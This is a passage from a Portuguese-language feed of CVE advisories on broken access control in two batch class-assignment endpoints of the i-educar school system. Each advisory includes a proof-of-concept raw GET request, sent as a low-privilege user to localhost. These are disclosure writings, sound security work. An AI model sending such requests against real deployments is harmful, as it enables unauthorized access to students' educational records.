&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10070/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10070/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10070/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10070/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10070/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10070/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte solicitação:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /enturmacao-em-lote/15 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função para atribuir alunos em lote às turmas. E este usuário não deveria fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10070/image-2.png&amp;#34;
	width=&amp;#34;1556&amp;#34;
	height=&amp;#34;667&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10070/image-2_hu_9bc692092386d63c.png 480w, /p/cve-2025-10070/image-2_hu_8c43eda558b10780.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;559px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10071</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10071/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10071/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10071-controle-de-acesso-quebrado-no-endpoint-cancelar-enturmacao-em-loteid&amp;#34;&amp;gt;CVE-2025-10071: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10071-controle-de-acesso-quebrado-no-endpoint-cancelar-enturmacao-em-loteid&amp;#34;&amp;gt;CVE-2025-10071: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10071/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10071/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10071/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10071/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10071/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10071/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte solicitação:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /cancelar-enturmacao-em-lote/15 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/enturmacao-em-lote/15
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função para atribuir alunos em lote às turmas. E este usuário não deveria fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10071/image-2.png&amp;#34;
	width=&amp;#34;1573&amp;#34;
	height=&amp;#34;669&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10071/image-2_hu_c622a1c3b8276d3c.png 480w, /p/cve-2025-10071/image-2_hu_f4790faff4a3d16.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;235&amp;#34;
		data-flex-basis=&amp;#34;564px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
